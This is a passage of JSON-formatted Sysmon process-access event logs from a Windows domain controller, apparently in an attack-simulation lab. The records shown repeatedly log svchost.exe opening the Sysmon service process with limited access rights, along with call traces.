06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5885,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5886,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5887,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5888,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5889,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.495","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.495\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 